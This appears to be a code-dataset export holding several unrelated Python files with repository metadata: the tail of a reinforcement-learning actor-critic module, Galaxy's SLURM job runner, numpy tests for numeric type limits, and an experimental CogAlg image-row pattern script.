ret_dict["state_transformer_weights"][self.rssm._state_transformer.num_layers - 1][:, :bf] if "state_transformer_weights" in ret_dict else None)
ret_dict["t_importance"] = t_importance
if self.config.use_inside_transformer:
memory_importance_recon = states["t_importance"]
memory_importance_openl = prior["t_importance"]
memory_importance = tf.concat([memory_importance_recon, memory_importance_openl], 1)
ret_dict["memory_importance"] = memory_importance
if self.config.use_int_reward:
for k, head in self.heads.items():
print("head", k, flush=True)
if k.startswith('int_reward'):
int_reward = head(feat).mode()[:vb]
ret_dict[f'model_{k}'] = int_reward
if agent is not None:
recon_value = agent.critic(self.rssm.get_feat(states)).mode()[:vb]
openl_value = agent.critic(self.rssm.get_feat(prior)).mode()[:vb]
model_value = tf.concat([recon_value, openl_value], 1)
ret_dict["value"] = model_value
return ret_dict
class ActorCritic(common.Module):
def __init__(self, config, step, num_actions):
self.config = config
self.step = step
self.num_actions = num_actions
self.actor = common.MLP(num_actions, **config.actor)
self.critic = common.MLP([], **config.critic)
if config.slow_target:
self._target_critic = common.MLP([], **config.critic)
self._updates = tf.Variable(0, tf.int64)
else:
self._target_critic = self.critic
self.actor_opt = common.Optimizer('actor', **config.actor_opt)
self.critic_opt = common.Optimizer('critic', **config.critic_opt)
self.rewnorm = common.StreamNorm(**self.config.reward_norm)
def train(self, world_model, start, is_terminal, reward_fn):
print("in policy train()", flush=True)
metrics = {}
hor = self.config.imag_horizon
# The weights are is_terminal flags for the imagination start states.
# Technically, they should multiply the losses from the second trajectory
# step onwards, which is the first imagined step. However, we are not
# training the action that led into the first step anyway, so we can use
# them to scale the whole sequence.
with tf.GradientTape() as actor_tape:
seq = world_model.imagine(self.actor, start, is_terminal, hor)
reward = reward_fn(seq)
seq['reward'], mets1 = self.rewnorm(reward)
mets1 = {f'reward_{k}': v for k, v in mets1.items()}
target, mets2 = self.target(seq)
actor_loss, mets3 = self.actor_loss(seq, target)
with tf.GradientTape() as critic_tape:
critic_loss, mets4 = self.critic_loss(seq, target)
metrics.update(self.actor_opt(actor_tape, actor_loss, self.actor))
metrics.update(self.critic_opt(critic_tape, critic_loss, self.critic))
metrics.update(**mets1, **mets2, **mets3, **mets4)
self.update_slow_target() # Variables exist after first forward pass.
print("out policy train()", flush=True)
return metrics
def actor_loss(self, seq, target):
# Actions: 0 [a1] [a2] a3
# ^ | ^ | ^ |
# / v / v / v
# States: [z0]->[z1]-> z2 -> z3
# Targets: t0 [t1] [t2]
# Baselines: [v0] [v1] v2 v3
# Entropies: [e1] [e2]
# Weights: [ 1] [w1] w2 w3
# Loss: l1 l2
metrics = {}
# Two states are lost at the end of the trajectory, one for the boostrap
# value prediction and one because the corresponding action does not lead
# anywhere anymore. One target is lost at the start of the trajectory
# because the initial state comes from the replay buffer.
policy = self.actor(tf.stop_gradient(seq['feat'][:-2]))
if self.config.actor_grad == 'dynamics':
objective = target[1:]
elif self.config.actor_grad == 'reinforce':
baseline = self._target_critic(seq['feat'][:-2]).mode()
advantage = tf.stop_gradient(target[1:] - baseline)
objective = policy.log_prob(seq['action'][1:-1]) * advantage
elif self.config.actor_grad == 'both':
baseline = self._target_critic(seq['feat'][:-2]).mode()
advantage = tf.stop_gradient(target[1:] - baseline)
objective = policy.log_prob(seq['action'][1:-1]) * advantage
mix = common.schedule(self.config.actor_grad_mix, self.step)
objective = mix * target[1:] + (1 - mix) * objective
metrics['actor_grad_mix'] = mix
else:
raise NotImplementedError(self.config.actor_grad)
ent = policy.entropy()
ent_scale = common.schedule(self.config.actor_ent, self.step)
objective += ent_scale * ent
weight = tf.stop_gradient(seq['weight'])
actor_loss = -(weight[:-2] * objective).mean()
metrics['actor_ent'] = ent.mean()
metrics['actor_ent_scale'] = ent_scale
return actor_loss, metrics
def critic_loss(self, seq, target):
# States: [z0] [z1] [z2] z3
# Rewards: [r0] [r1] [r2] r3
# Values: [v0] [v1] [v2] v3
# Weights: [ 1] [w1] [w2] w3
# Targets: [t0] [t1] [t2]
# Loss: l0 l1 l2
dist = self.critic(seq['feat'][:-1])
target = tf.stop_gradient(target)
weight = tf.stop_gradient(seq['weight'])
critic_loss = -(dist.log_prob(target) * weight[:-1]).mean()
metrics = {'critic': dist.mode().mean()}
return critic_loss, metrics
def target(self, seq):
# States: [z0] [z1] [z2] [z3]
# Rewards: [r0] [r1] [r2] r3
# Values: [v0] [v1] [v2] [v3]
# Discount: [d0] [d1] [d2] d3
# Targets: t0 t1 t2
reward = tf.cast(seq['reward'], tf.float32)
disc = tf.cast(seq['discount'], tf.float32)
value = self._target_critic(seq['feat']).mode()
# Skipping last time step because it is used for bootstrapping.
target = common.lambda_return(
reward[:-1], value[:-1], disc[:-1],
bootstrap=value[-1],
lambda_=self.config.discount_lambda,
axis=0)
metrics = {}
metrics['critic_slow'] = value.mean()
metrics['critic_target'] = target.mean()
return target, metrics
def update_slow_target(self):
if self.config.slow_target:
if self._updates % self.config.slow_target_update == 0:
mix = 1.0 if self._updates == 0 else float(
self.config.slow_target_fraction)
for s, d in zip(self.critic.variables, self._target_critic.variables):
d.assign(mix * s + (1 - mix) * d)
self._updates.assign_add(1)
| 46.787955
| 169
| 0.571574
|
794d9bde7aed8babf3ac89b5bd55781a3d150d0c
| 9,660
|
py
|
Python
|
lib/galaxy/jobs/runners/slurm.py
|
rhpvorderman/galaxy
|
178015f8eff0b0c7a59c0d6756658f6428222837
|
[
"CC-BY-3.0"
] | 1,085
|
2015-02-18T16:14:38.000Z
|
2022-03-30T23:52:07.000Z
|
lib/galaxy/jobs/runners/slurm.py
|
rhpvorderman/galaxy
|
178015f8eff0b0c7a59c0d6756658f6428222837
|
[
"CC-BY-3.0"
] | 11,253
|
2015-02-18T17:47:32.000Z
|
2022-03-31T21:47:03.000Z
|
lib/galaxy/jobs/runners/slurm.py
|
rhpvorderman/galaxy
|
178015f8eff0b0c7a59c0d6756658f6428222837
|
[
"CC-BY-3.0"
] | 1,000
|
2015-02-18T16:18:10.000Z
|
2022-03-29T08:22:56.000Z
|
"""
SLURM job control via the DRMAA API.
"""
import os
import time
from galaxy import model
from galaxy.jobs.runners.drmaa import DRMAAJobRunner
from galaxy.util import commands
from galaxy.util.custom_logging import get_logger
log = get_logger(__name__)
__all__ = ('SlurmJobRunner', )
# Error message printed to job stderr when SLURM itself kills a job.
# See src/common/slurm_jobacct_gather.c and src/slurmd/slurmd/req.c in
# https://github.com/SchedMD/slurm/
SLURM_MEMORY_LIMIT_EXCEEDED_MSG = 'slurmstepd: error: Exceeded job memory limit'
# Warning messages which may be printed to job stderr by SLURM after termination
# of a job step when using the cgroup task plugin. The exceeded memory is not
# always the cause of the step termination, which can be successful.
# See src/plugins/task/cgroup/task_cgroup_memory.c in
# https://github.com/SchedMD/slurm/
SLURM_MEMORY_LIMIT_EXCEEDED_PARTIAL_WARNINGS = [': Exceeded job memory limit at some point.',
': Exceeded step memory limit at some point.']
# These messages are returned to the user
OUT_OF_MEMORY_MSG = 'This job was terminated because it used more memory than it was allocated.'
PROBABLY_OUT_OF_MEMORY_MSG = 'This job was cancelled probably because it used more memory than it was allocated.'
class SlurmJobRunner(DRMAAJobRunner):
runner_name = "SlurmRunner"
restrict_job_name_length = False
def _complete_terminal_job(self, ajs, drmaa_state, **kwargs):
def _get_slurm_state_with_sacct(job_id, cluster):
cmd = ['sacct', '-n', '-o', 'state%-32']
if cluster:
cmd.extend(['-M', cluster])
cmd.extend(['-j', job_id])
try:
stdout = commands.execute(cmd)
except commands.CommandLineException as e:
if e.stderr.strip() == 'SLURM accounting storage is disabled':
log.warning('SLURM accounting storage is not properly configured, unable to run sacct')
return
raise e
# First line is for 'job_id'
# Second line is for 'job_id.batch' (only available after the batch job is complete)
# Following lines are for the steps 'job_id.0', 'job_id.1', ... (but Galaxy does not use steps)
first_line = stdout.splitlines()[0]
# Strip whitespaces and the final '+' (if present), only return the first word
return first_line.strip().rstrip('+').split()[0]
def _get_slurm_state():
cmd = ['scontrol', '-o']
if '.' in ajs.job_id:
# custom slurm-drmaa-with-cluster-support job id syntax
job_id, cluster = ajs.job_id.split('.', 1)
cmd.extend(['-M', cluster])
else:
job_id = ajs.job_id
cluster = None
cmd.extend(['show', 'job', job_id])
try:
stdout = commands.execute(cmd).strip()
except commands.CommandLineException as e:
if e.stderr == 'slurm_load_jobs error: Invalid job id specified\n':
# The job may be old, try to get its state with sacct
job_state = _get_slurm_state_with_sacct(job_id, cluster)
if job_state:
return job_state
return 'NOT_FOUND'
raise e
# stdout is a single line in format "key1=value1 key2=value2 ..."
job_info_keys = []
job_info_values = []
for job_info in stdout.split():
try:
# Some value may contain `=` (e.g. `StdIn=StdIn=/dev/null`)
k, v = job_info.split('=', 1)
job_info_keys.append(k)
job_info_values.append(v)
except ValueError:
# Some value may contain spaces (e.g. `Comment=** time_limit (60m) min_nodes (1) **`)
job_info_values[-1] += f" {job_info}"
job_info_dict = dict(zip(job_info_keys, job_info_values))
return job_info_dict['JobState']
try:
if drmaa_state == self.drmaa_job_states.FAILED:
slurm_state = _get_slurm_state()
sleep = 1
while slurm_state == 'COMPLETING':
log.debug('(%s/%s) Waiting %s seconds for failed job to exit COMPLETING state for post-mortem', ajs.job_wrapper.get_id_tag(), ajs.job_id, sleep)
time.sleep(sleep)
sleep *= 2
if sleep > 64:
ajs.fail_message = "This job failed and the system timed out while trying to determine the cause of the failure."
break
slurm_state = _get_slurm_state()
if slurm_state == 'NOT_FOUND':
log.warning('(%s/%s) Job not found, assuming job check exceeded MinJobAge and completing as successful', ajs.job_wrapper.get_id_tag(), ajs.job_id)
drmaa_state = self.drmaa_job_states.DONE
elif slurm_state == 'COMPLETED':
log.debug("(%s/%s) SLURM reported job success, assuming job check exceeded MinJobAge and completing as successful", ajs.job_wrapper.get_id_tag(), ajs.job_id)
drmaa_state = self.drmaa_job_states.DONE
elif slurm_state == 'TIMEOUT':
log.info('(%s/%s) Job hit walltime', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = "This job was terminated because it ran longer than the maximum allowed job run time."
ajs.runner_state = ajs.runner_states.WALLTIME_REACHED
elif slurm_state == 'NODE_FAIL':
log.warning('(%s/%s) Job failed due to node failure, attempting resubmission', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.job_wrapper.change_state(model.Job.states.QUEUED, info='Job was resubmitted due to node failure')
try:
self.queue_job(ajs.job_wrapper)
return
except Exception:
ajs.fail_message = "This job failed due to a cluster node failure, and an attempt to resubmit the job failed."
elif slurm_state == 'OUT_OF_MEMORY':
log.info('(%s/%s) Job hit memory limit (SLURM state: OUT_OF_MEMORY)', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = OUT_OF_MEMORY_MSG
ajs.runner_state = ajs.runner_states.MEMORY_LIMIT_REACHED
elif slurm_state == 'CANCELLED':
# Check to see if the job was killed for exceeding memory consumption
check_memory_limit_msg = self.__check_memory_limit(ajs.error_file)
if check_memory_limit_msg:
log.info('(%s/%s) Job hit memory limit (SLURM state: CANCELLED)', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = check_memory_limit_msg
ajs.runner_state = ajs.runner_states.MEMORY_LIMIT_REACHED
else:
log.info('(%s/%s) Job was cancelled via SLURM (e.g. with scancel(1))', ajs.job_wrapper.get_id_tag(), ajs.job_id)
ajs.fail_message = "This job failed because it was cancelled by an administrator."
elif slurm_state in ('PENDING', 'RUNNING'):
log.warning('(%s/%s) Job was reported by drmaa as terminal but job state in SLURM is: %s, returning to monitor queue', ajs.job_wrapper.get_id_tag(), ajs.job_id, slurm_state)
return True
else:
log.warning('(%s/%s) Job failed due to unknown reasons, job state in SLURM was: %s', ajs.job_wrapper.get_id_tag(), ajs.job_id, slurm_state)
ajs.fail_message = "This job failed for reasons that could not be determined."
if drmaa_state == self.drmaa_job_states.FAILED:
ajs.fail_message += '\nPlease click the bug icon to report this problem if you need help.'
ajs.stop_job = False
self.work_queue.put((self.fail_job, ajs))
return
except Exception:
log.exception('(%s/%s) Failure in SLURM _complete_terminal_job(), job final state will be: %s', ajs.job_wrapper.get_id_tag(), ajs.job_id, drmaa_state)
# by default, finish the job with the state from drmaa
return super()._complete_terminal_job(ajs, drmaa_state=drmaa_state)
def __check_memory_limit(self, efile_path):
"""
A very poor implementation of tail, but it doesn't need to be fancy
since we are only searching the last 2K
"""
try:
log.debug('Checking %s for exceeded memory message from SLURM', efile_path)
with open(efile_path) as f:
if os.path.getsize(efile_path) > 2048:
f.seek(-2048, os.SEEK_END)
f.readline()
for line in f.readlines():
stripped_line = line.strip()
if stripped_line == SLURM_MEMORY_LIMIT_EXCEEDED_MSG:
return OUT_OF_MEMORY_MSG
elif any(_ in stripped_line for _ in SLURM_MEMORY_LIMIT_EXCEEDED_PARTIAL_WARNINGS):
return PROBABLY_OUT_OF_MEMORY_MSG
except Exception:
log.exception('Error reading end of %s:', efile_path)
return False
| 55.83815
| 193
| 0.591615
|
794d9d0b70f1a2757c266d5e88687961d25c58d4
| 2,753
|
py
|
Python
|
numpy/core/tests/test_getlimits.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/core/tests/test_getlimits.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/core/tests/test_getlimits.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
""" Test functions for limits module.
"""
from __future__ import division, absolute_import
from numpy.testing import *
from numpy.core import finfo, iinfo
from numpy import half, single, double, longdouble
import numpy as np
##################################################
class TestPythonFloat(TestCase):
def test_singleton(self):
ftype = finfo(float)
ftype2 = finfo(float)
assert_equal(id(ftype),id(ftype2))
class TestHalf(TestCase):
def test_singleton(self):
ftype = finfo(half)
ftype2 = finfo(half)
assert_equal(id(ftype),id(ftype2))
class TestSingle(TestCase):
def test_singleton(self):
ftype = finfo(single)
ftype2 = finfo(single)
assert_equal(id(ftype),id(ftype2))
class TestDouble(TestCase):
def test_singleton(self):
ftype = finfo(double)
ftype2 = finfo(double)
assert_equal(id(ftype),id(ftype2))
class TestLongdouble(TestCase):
def test_singleton(self,level=2):
ftype = finfo(longdouble)
ftype2 = finfo(longdouble)
assert_equal(id(ftype),id(ftype2))
class TestIinfo(TestCase):
def test_basic(self):
dts = zip(['i1', 'i2', 'i4', 'i8',
'u1', 'u2', 'u4', 'u8'],
[np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64])
for dt1, dt2 in dts:
assert_equal(iinfo(dt1).min, iinfo(dt2).min)
assert_equal(iinfo(dt1).max, iinfo(dt2).max)
self.assertRaises(ValueError, iinfo, 'f4')
def test_unsigned_max(self):
types = np.sctypes['uint']
for T in types:
assert_equal(iinfo(T).max, T(-1))
class TestRepr(TestCase):
def test_iinfo_repr(self):
expected = "iinfo(min=-32768, max=32767, dtype=int16)"
assert_equal(repr(np.iinfo(np.int16)), expected)
def test_finfo_repr(self):
expected = "finfo(resolution=1e-06, min=-3.4028235e+38," + \
" max=3.4028235e+38, dtype=float32)"
# Python 2.5 float formatting on Windows adds an extra 0 to the
# exponent. So test for both. Once 2.5 compatibility is dropped, this
# can simply use `assert_equal(repr(np.finfo(np.float32)), expected)`.
expected_win25 = "finfo(resolution=1e-006, min=-3.4028235e+038," + \
" max=3.4028235e+038, dtype=float32)"
actual = repr(np.finfo(np.float32))
if not actual == expected:
if not actual == expected_win25:
msg = build_err_msg([actual, desired], verbose=True)
raise AssertionError(msg)
def test_instances():
iinfo(10)
finfo(3.0)
if __name__ == "__main__":
run_module_suite()
| 31.643678
| 79
| 0.602615
|
794d9d330e0dc89959942d07451cc052151dad54
| 15,826
|
py
|
Python
|
line_1D_alg/alternative versions/line_patterns_dict.py
|
vishalbelsare/CogAlg
|
ec54406be2f68c3ccb07bef13fc486d097784c49
|
[
"MIT"
] | 102
|
2016-10-09T01:33:00.000Z
|
2022-01-28T01:03:23.000Z
|
line_1D_alg/alternative versions/line_patterns_dict.py
|
alex-pitertsev/CogAlg
|
23542710a172fccdcdccdca37e354283dd9f57bf
|
[
"MIT"
] | 41
|
2017-06-04T16:09:43.000Z
|
2022-01-20T21:11:42.000Z
|
line_1D_alg/alternative versions/line_patterns_dict.py
|
alex-pitertsev/CogAlg
|
23542710a172fccdcdccdca37e354283dd9f57bf
|
[
"MIT"
] | 50
|
2017-05-10T06:25:36.000Z
|
2021-08-02T20:28:54.000Z
|
'''
line_patterns using dicts vs. classes, Kelvin's port
'''
# add ColAlg folder to system path
import sys
from os.path import dirname, join, abspath
sys.path.insert(0, abspath(join(dirname("CogAlg"), '../..')))
import cv2
import csv
import argparse
from time import time
from utils import *
from itertools import zip_longest
from frame_2D_alg.class_cluster import setdict_attr, NoneType, comp_param
ave = 15 # |difference| between pixels that coincides with average value of Pm
ave_min = 2 # for m defined as min |d|: smaller?
ave_M = 50 # min M for initial incremental-range comparison(t_), higher cost than der_comp?
ave_D = 5 # min |D| for initial incremental-derivation comparison(d_)
ave_nP = 5 # average number of sub_Ps in P, to estimate intra-costs? ave_rdn_inc = 1 + 1 / ave_nP # 1.2
ave_rdm = .5 # obsolete: average dm / m, to project bi_m = m * 1.5
ave_merge = 50 # to merge a kernel of 3 adjacent Ps
init_y = 0 # starting row, the whole frame doesn't need to be processed
'''
Conventions:
postfix '_' denotes array name, vs. same-name elements
prefix '_' denotes prior of two same-name variables
prefix 'f' denotes flag
capitalized variables are normally summed small-case variables
'''
def cross_comp(frame_of_pixels_): # converts frame_of_pixels to frame_of_patterns, each pattern maybe nested
Y, X = frame_of_pixels_.shape # Y: frame height, X: frame width
frame_of_patterns_ = []
'''
if cross_comp_spliced: process all image rows as a single line, vertically consecutive and preserving horizontal direction:
pixel_=[]; dert_=[]
for y in range(init_y + 1, Y):
pixel_.append([ frame_of_pixels_[y, :]]) # splice all rows into pixel_
_i = pixel_[0]
else:
'''
for y in range(init_y + 1, Y): # y is index of new line pixel_, a brake point here, we only need one row to process
# initialization:
dert_ = [] # line-wide i_, p_, d_, m__
pixel_ = frame_of_pixels_[y, :]
_i = pixel_[0]
# pixel i is compared to prior pixel _i in a row:
for i in pixel_[1:]:
d = i -_i
p = i +_i
m = ave - abs(d) # for consistency with deriv_comp output, otherwise redundant
dert_.append({'i':i,'p':p,'d':d,'m':m})
_i = i
# form m Patterns, evaluate intra_Pm_ per Pm:
Pm_ = form_P_(dert_, rdn=1, rng=1, fPd=False)
# add line of patterns to frame of patterns:
frame_of_patterns_.append(Pm_) # skip if cross_comp_spliced
return frame_of_patterns_ # frame of patterns is an intput to level 2
def form_P_(dert_, rdn, rng, fPd): # accumulation and termination
# initialization:
P_ = []
x = 0
_sign = None # to initialize 1st P, (None != True) and (None != False) are both True
for dert in dert_: # segment by sign
if fPd: sign = dert['d'] > 0
else: sign = dert['m'] > 0
if sign != _sign:
# sign change, initialize and append P
P = {'sign':_sign, 'L':1, 'I':dert['p'], 'D':dert['d'], 'M':dert['m'], 'x0':x, 'dert_':[dert], 'sublayers':[], 'fPd':fPd}
P_.append(P) # still updated with accumulation below
else:
# accumulate params:
P['L'] += 1; P['I'] += dert['p']; P['D'] += dert['d']; P['M'] += dert['m']
P['dert_'] += [dert]
x += 1
_sign = sign
if len(P_) > 4:
#P_ = splice_P_(P_, fPd=0) # merge meanI- or meanD- similar and weakly separated Ps
#if len(P_) > 4:
intra_Pm_(P_, rdn, rng, not fPd) # evaluates range_comp | deriv_comp sub-recursion per Pm
'''
with open("frame_of_patterns_2.csv", "a") as csvFile: # current layer visualization
write = csv.writer(csvFile, delimiter=",")
for item in range(len(P_)):
# print(P_[item].L, P_[item].I, P_[item].D, P_[item].M, P_[item].x0)
write.writerow([P_[item].L, P_[item].I, P_[item].D, P_[item].M, P_[item].x0])
'''
return P_
'''
Sub-recursion in intra_P extends pattern with sub_: hierarchy of sub-patterns, to be adjusted by macro-feedback:
'''
def intra_Pm_(P_, rdn, rng, fPd): # evaluate for sub-recursion in line Pm_, pack results into sub_Pm_
adj_M_ = form_adjacent_M_(P_) # compute adjacent Ms to evaluate contrastive borrow potential
comb_layers = [] # combine into root P sublayers[1:]
for P, adj_M in zip(P_, adj_M_): # each sub_layer is nested to depth = sublayers[n]
if P['L'] > 2 ** (rng+1): # rng+1 because rng is initialized at 0, as all params
if P['M'] > 0: # low-variation span, eval comp at rng=2^n: 1, 2, 3; kernel size 2, 4, 8...
if P['M'] - adj_M > ave_M * rdn: # reduced by lending to contrast: all comps form params for hLe comp?
'''
if localized filters:
P_ave = (P.M - adj_M) / P.L
loc_ave = (ave - P_ave) / 2 # ave is reduced because it's for inverse deviation, possibly negative?
loc_ave_min = (ave_min + P_ave) / 2
rdert_ = range_comp(P.dert_, loc_ave, loc_ave_min, fid)
'''
rdert_ = range_comp(P['dert_']) # rng+ comp with localized ave, skip predictable next dert
rdn += 1; rng += 1
sub_Pm_ = form_P_(rdert_, rdn, rng, fPd=False) # cluster by m sign, eval intra_Pm_
Ls = len(sub_Pm_)
P['sublayers'] += [[(Ls, False, fPd, rdn, rng, sub_Pm_)]] # add Dert=[] if Ls > min?
# 1st sublayer is single-element, packed in double brackets only to allow nesting for deeper sublayers
if len(sub_Pm_) > 4:
P['sublayers'] += intra_Pm_(sub_Pm_, rdn+1 + 1/Ls, rng+1, fPd) # feedback
# add param summation within sublayer, for comp_sublayers?
# splice sublayers across sub_Ps:
comb_layers = [comb_layers + sublayers for comb_layers, sublayers in
zip_longest(comb_layers, P['sublayers'], fillvalue=[])]
else: # neg Pm: high-variation span, min neg M is contrast value, borrowed from adjacent +Pms:
if min(-P['M'], adj_M) > ave_D * rdn: # cancelled M+ val, M = min | ~v_SAD
rel_adj_M = adj_M / -P['M'] # for allocation of -Pm' adj_M to each of its internal Pds
sub_Pd_ = form_P_(P['dert_'], rdn+1, rng, fPd=True) # cluster by d sign: partial d match, eval intra_Pm_(Pdm_)
Ls = len(sub_Pd_)
P['sublayers'] += [[(Ls, True, True, rdn, rng, sub_Pd_)]] # 1st layer, Dert=[], fill if Ls > min?
P['sublayers'] += intra_Pd_(sub_Pd_, rel_adj_M, rdn+1 + 1/Ls, rng) # der_comp eval per nPm
# splice sublayers across sub_Ps, for return as root sublayers[1:]:
comb_layers = [comb_layers + sublayers for comb_layers, sublayers in
zip_longest(comb_layers, P['sublayers'], fillvalue=[])]
return comb_layers
def intra_Pd_(Pd_, rel_adj_M, rdn, rng): # evaluate for sub-recursion in line P_, packing results in sub_P_
comb_layers = []
for P in Pd_: # each sub in sub_ is nested to depth = sub_[n]
if min(abs(P['D']), abs(P['D']) * rel_adj_M) > ave_D * rdn and P['L'] > 3: # abs(D) * rel_adj_M: allocated adj_M
# cross-comp of ds:
ddert_ = deriv_comp(P['dert_']) # i is d
sub_Pm_ = form_P_(ddert_, rdn+1, rng+1, fPd=True) # cluster Pd derts by md sign, eval intra_Pm_(Pdm_), won't happen
Ls = len(sub_Pm_)
# 1st layer: Ls, fPd, fid, rdn, rng, sub_P_:
P['sublayers'] += [[(Ls, True, True, rdn, rng, sub_Pm_ )]]
if len(sub_Pm_) > 3:
P['sublayers'] += intra_Pm_(sub_Pm_, rdn+1 + 1/Ls, rng + 1, fPd=True)
# splice sublayers across sub_Ps:
comb_layers = [comb_layers + sublayers for comb_layers, sublayers in
zip_longest(comb_layers, P['sublayers'], fillvalue=[])]
'''
adj_M is not affected by primary range_comp per Pm?
no comb_m = comb_M / comb_S, if fid: comb_m -= comb_|D| / comb_S: alt rep cost
same-sign comp: parallel edges, cross-sign comp: M - (~M/2 * rL) -> contrast as 1D difference?
'''
return comb_layers
def form_adjacent_M_(Pm_): # compute array of adjacent Ms, for contrastive borrow evaluation
'''
Value is projected match, while variation has contrast value only: it matters to the extent that it interrupts adjacent match: adj_M.
In noise, there is a lot of variation. but no adjacent match to cancel, so that variation has no predictive value.
On the other hand, we may have a 2D outline or 1D contrast with low gradient / difference, but it terminates some high-match area.
Contrast is salient to the extent that it can borrow sufficient predictive value from adjacent high-match area.
'''
M_ = [Pm['M'] for Pm in Pm_] # list of Ms in the order of Pm_
adj_M_ = [(abs(prev_M) + abs(next_M)) / 2
for prev_M, next_M in zip(M_[:-2], M_[2:])] # adjacent Ms, first and last Ms
adj_M_ = [M_[1]] + adj_M_ + [M_[-2]] # sum previous and next adjacent Ms
''' expanded:
pri_M = Pm_[0].M # deriv_comp value is borrowed from adjacent opposite-sign Ms
M = Pm_[1].M
adj_M_ = [abs(Pm_[1].M)] # initial next_M, also projected as prior for first P
for Pm in Pm_[2:]:
next_M = Pm.M
adj_M_.append((abs(pri_M / 2) + abs(next_M / 2))) # exclude M
pri_M = M
M = next_M
adj_M_.append(abs(pri_M)) # no / 2: projection for last P
'''
return adj_M_
def range_comp(dert_): # cross-comp of 2**rng- distant pixels: 4,8,16.., skipping intermediate pixels
rdert_ = []
_i = dert_[0]['i']
for dert in dert_[2::2]: # all inputs are sparse, skip odd pixels compared in prior rng: 1 skip / 1 add, to maintain 2x overlap
d = dert['i'] -_i
rp = dert['p'] + _i # intensity accumulated in rng
rd = dert['d'] + d # difference accumulated in rng
rm = dert['m'] + ave - abs(d) # m accumulated in rng
# for consistency with deriv_comp, else m is redundant
rdert_.append({'i':dert['i'],'p':rp,'d':rd,'m':rm})
_i = dert['i']
return rdert_
def deriv_comp(dert_): # cross-comp consecutive ds in same-sign dert_: sign match is partial d match
# dd and md may match across d sign, but likely in high-match area, spliced by spec in comp_P?
# initialization:
ddert_ = []
_d = abs( dert_[0]['d']) # same-sign in Pd
for dert in dert_[1:]:
# same-sign in Pd
d = abs( dert['d'] )
rd = d + _d
dd = d - _d
md = min(d, _d) - abs( dd/2) - ave_min # min_match because magnitude of derived vars corresponds to predictive value
ddert_.append({'i':dert['d'],'p':rd,'d':dd,'m':md})
_d = d
return ddert_
def splice_P_(P_, fPd):
'''
Initial P separation is determined by pixel-level sign change, but resulting opposite-sign pattern may be relatively weak,
and same-sign patterns it separates relatively strong.
Another criterion to re-evaluate separation is similarity of defining param: M/L for Pm, D/L for Pd, among the three Ps
If relative proximity * relative similarity > merge_ave: all three Ps should be merged into one.
'''
new_P_ = []
while len(P_) > 2: # at least 3 Ps
__P = P_.pop(0)
_P = P_.pop(0)
P = P_.pop(0)
if splice_eval(__P, _P, P, fPd) > ave_merge: # no * ave_rM * (1 + _P.L / (__P.L+P.L) / 2): _P.L is not significant
# for debugging
#print('P_'+str(_P.id)+' and P_'+str(P.id)+' are merged into P_'+str(__P.id))
# merge _P and P into __P
for merge_P in [_P, P]:
__P.x0 = min(__P.x0, merge_P.x0)
__P.accum_from(merge_P)
__P.dert_+= merge_P.dert_
# back splicing
__P = splice_P_back(new_P_, __P, fPd)
P_.insert(0, __P) # insert merged __P back into P_ to continue merging
else:
new_P_.append(__P) # append __P to P_ when there is no further merging process for __P
P_.insert(0, P) # insert P back into P_ for the consecutive merging process
P_.insert(0, _P) # insert _P back into P_ for the consecutive merging process
# pack remaining Ps:
if P_: new_P_ += P_
return new_P_
def splice_P_back(new_P_, P, fPd): # P is __P in calling splice_P_
while len(new_P_) > 2: # at least 3 Ps
_P = new_P_.pop()
__P = new_P_.pop()
if splice_eval(__P, _P, P, fPd) > ave_merge: # no * ave_rM * (1 + _P.L / (__P.L+P.L) / 2):
# match projected at distance between P,__P: rM is insignificant
# for debug purpose
#print('P_'+str(_P.id)+' and P_'+str(P.id)+' are backward merged into P_'+str(__P.id))
# merge _P and P into __P
for merge_P in [_P, P]:
__P.x0 = min(__P.x0, merge_P.x0)
__P.accum_from(merge_P)
__P.dert_+= merge_P.dert_
P = __P # also returned
else:
new_P_+= [__P, _P]
break
return P
def splice_eval(__P, _P, P, fPd): # should work for splicing Pps too
'''
For 3 Pms, same-sign P1 and P3, and opposite-sign P2:
relative proximity = abs((M1+M3) / M2)
relative similarity = match (M1/L1, M3/L3) / miss (match (M1/L1, M2/L2) + match (M3/L3, M2/L2)) # both should be negative
'''
if fPd:
proximity = abs((__P.D + P.D) / _P.D) if _P.D != 0 else 0 # prevents /0
__mean=__P.D/__P.L; _mean=_P.D/_P.L; mean=P.D/P.L
else:
proximity = abs((__P.M + P.M) / _P.M) if _P.M != 0 else 0 # prevents /0
__mean=__P.M/__P.L; _mean=_P.M/_P.L; mean=P.M/P.L
m13 = min(mean, __mean) - abs(mean-__mean)/2 # P1 & P3
m12 = min(_mean, __mean) - abs(_mean-__mean)/2 # P1 & P2
m23 = min(_mean, mean) - abs(_mean- mean)/2 # P2 & P3
similarity = m13 / abs( m12 + m23) # both should be negative
merge_value = proximity * similarity
return merge_value
if __name__ == "__main__":
'''
Parse argument (image)
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument('-i', '--image', help='path to image file', default='.//raccoon.jpg')
arguments = vars(argument_parser.parse_args())
# Read image
image = cv2.imread(arguments['image'], 0).astype(int) # load pix-mapped image
'''
# show image in the same window as a code
image = cv2.imread('../raccoon.jpg', 0).astype(int) # manual load pix-mapped image
assert image is not None, "No image in the path"
render = 0
verbose = 0
if render:
plt.figure();plt.imshow(image, cmap='gray') # show the image below in gray
# for visualization:
with open("frame_of_patterns_2.csv", "w") as csvFile:
write = csv.writer(csvFile, delimiter=",")
fieldnames = ("L=", "I=", "D=", "M=", "x0=")
write.writerow(fieldnames)
start_time = time()
# Main
frame_of_patterns_ = cross_comp(image) # returns Pm__
# from pprint import pprint
# pprint(frame_of_patterns_[0]) # shows 1st layer Pm_ only
fline_PPs = 0
if fline_PPs: # debug line_PPs_draft
from line_PPs_draft import *
frame_PP_ = []
for y, P_ in enumerate(frame_of_patterns_):
PP_ = search(P_)
frame_PP_.append(PP_)
